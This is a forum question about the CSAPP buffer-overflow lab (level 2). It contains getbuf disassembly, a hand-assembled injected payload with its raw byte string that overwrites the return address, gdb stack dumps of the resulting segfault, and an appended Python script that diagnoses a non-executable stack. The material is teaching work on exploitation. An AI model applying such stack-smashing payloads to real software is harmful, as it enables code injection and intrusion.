Segmentation fault when exploit string overwrites the return pointer with the starting address on stack


I'm doing the CSAPP buflab level 2. In this assignment I'm asked to input an exploit string using getbuf(). Mine looks like:

08048fe0 <getbuf>:
 8048fe0:   55                      push   %ebp
 8048fe1:   89 e5                   mov    %esp,%ebp
 8048fe3:   83 ec 18                sub    $0x18,%esp
 8048fe6:   8d 45 f4                lea    -0xc(%ebp),%eax
 8048fe9:   89 04 24                mov    %eax,(%esp)
 8048fec:   e8 6f fe ff ff          call   8048e60 <Gets>
 8048ff1:   b8 01 00 00 00          mov    $0x1,%eax
 8048ff6:   c9                      leave  
 8048ff7:   c3                      ret    
 8048ff8:   90                      nop
 8048ff9:   8d b4 26 00 00 00 00    lea    0x0(%esi,%eiz,1),%esi

And bang() checks global_value:

void bang(int val)
{
    entry_check(2); /* Make sure entered this function properly */
    if (global_value == cookie) {
        printf("Bang!: You set global_value to 0x%x\n", global_value);
        validate(2);
    } else
        printf("Misfire: global_value = 0x%x\n", global_value);
    exit(0);
}

So I find the address:

0804a1dc <global_value>:
804a1dc:     00 00 00 00

And my exploit string looks like:

00000000 <.text>:
   0:     c7 05 dc a1 04 08 6c      movl   $0x6355476c,0x804a1dc
   7:     47 55 63 
   a:     68 60 8d 04 08            push   $0x8048d60
   f:     c3                        ret  

Then I search for the address of the input string (it should be on the stack):

Breakpoint 1, 0x08048fe6 in getbuf ()
(gdb) print /x ($ebp-0xc)
$1 = 0xffffb3ac
(gdb) 

So my input string is c7 05 dc a1 04 08 6c 47 55 63 68 60 8d 04 08 c3 ac b3 ff ff

However, I still get a segmentation fault. The result shows that I entered the right address, and I successfully passed levels 0 and 1 using the same strategy; I don't understand where I went wrong...

Reading symbols from bufbomb...done.
(gdb) break *getbuf+17
Breakpoint 1 at 0x8048ff1
(gdb) run -t PB12000359 < fire_hex_raw 
Starting program: /home/xgwang/Workspace/csapp_exp/Lab3 [buf Lab]/workspace/bufbomb -t PB12000359 < fire_hex_raw
Team: PB12000359
Cookie: 0x6355476c

Breakpoint 1, 0x08048ff1 in getbuf ()
(gdb) x/10x $esp
0xffffb3a0: 0xffffb3ac  0x555ac728  0x555e819b  0xa1dc05c7
0xffffb3b0: 0x476c0804  0x60686355  0xc308048d  0xffffb3ac
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xffffb3ac in ?? ()
(gdb) 

This is the successful version of level 0 (where I was asked to simply overwrite the return address with another function's starting address). Notice that the addresses are in the same place, but level 2 just failed.

Reading symbols from bufbomb...done.
(gdb) break *getbuf+17
Breakpoint 1 at 0x8048ff1
(gdb) run -t PB12000359 < smoke_raw 
Starting program: /home/xgwang/Workspace/csapp_exp/Lab3 [buf Lab]/workspace/bufbomb -t PB12000359 < smoke_raw
Team: PB12000359
Cookie: 0x6355476c

Breakpoint 1, 0x08048ff1 in getbuf ()
(gdb) x/10x $esp
0xffffb3a0: 0xffffb3ac  0x555ac728  0x555e819b  0x00000000
0xffffb3b0: 0x00000000  0x00000000  0x00000000  0x08048e20
0xffffb3c0: 0x00000000  0x08049ac7
(gdb) cont
Continuing.
Type string:Smoke!: You called smoke()

Thanks for any advice.

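As an added example (not from the question or the lab's own code), a Python script that applies the frame layout read off the getbuf disassembly above (sub $0x18,%esp; buffer at -0xc(%ebp)) to the two gdb dumps in the question, reassembles the 20 bytes that landed in the frame and reports what the return-address slot holds; it assumes the breakpoint at getbuf+17 with %esp = 0xffffb3a0 as shown.

```python
import re

# Constructed from the two "x/10x $esp" dumps in the question, taken at the
# breakpoint on getbuf+17 (right after Gets() returns), %esp = 0xffffb3a0.
FIRE_DUMP = """\
0xffffb3a0: 0xffffb3ac  0x555ac728  0x555e819b  0xa1dc05c7
0xffffb3b0: 0x476c0804  0x60686355  0xc308048d  0xffffb3ac
"""
SMOKE_DUMP = """\
0xffffb3a0: 0xffffb3ac  0x555ac728  0x555e819b  0x00000000
0xffffb3b0: 0x00000000  0x00000000  0x00000000  0x08048e20
0xffffb3c0: 0x00000000  0x08049ac7
"""
FRAME_SIZE = 0x18  # "sub $0x18,%esp" in getbuf
BUF_OFFSET = 0x0c  # "lea -0xc(%ebp),%eax": the buffer starts at ebp-0xc


def parse_dump(text):
    # Map every 32-bit word of a gdb "x/Nx" dump to its stack address.
    words = {}
    for line in text.splitlines():
        m = re.match(r"\s*0x([0-9a-f]+):\s+(.*)$", line)
        if m:
            base = int(m.group(1), 16)
            for i, tok in enumerate(m.group(2).split()):
                words[base + 4 * i] = int(tok, 16)
    return words


def analyze(dump_text, esp, fault_pc=None):
    # Apply getbuf's frame layout to the dump and report what sits in the
    # return-address slot; fault_pc is the address gdb reported for SIGSEGV.
    words = parse_dump(dump_text)
    ebp = esp + FRAME_SIZE   # %ebp inside getbuf
    buf = ebp - BUF_OFFSET   # 12-byte buffer, then saved %ebp, then ret
    ret_slot = ebp + 4
    # Memory-order bytes from the buffer start through the return slot
    # (12 + 4 + 4 = 20); every word is little-endian.
    payload = b"".join(words[a].to_bytes(4, "little")
                       for a in range(buf, ret_slot + 4, 4))
    ret = words[ret_slot]
    return {
        "buf": buf, "ret_slot": ret_slot, "ret": ret, "payload": payload,
        # True when control was sent back into the dumped stack region.
        "ret_on_stack": min(words) <= ret <= max(words),
        # True when the crash PC is exactly the return target: the ret
        # itself worked and the fault hit the first fetch at that address.
        "fault_at_ret": fault_pc is not None and fault_pc == ret,
    }
```

For the fire dump the slot holds 0xffffb3ac and gdb's faulting PC is that same address, so the ret executed and the fault occurred on fetching the first instruction from the stack, before the injected store to global_value (a writable global) could run. That is the pattern a non-executable stack produces, not the pattern of a wrong address, whereas the smoke dump returns into .text at 0x08048e20 and runs.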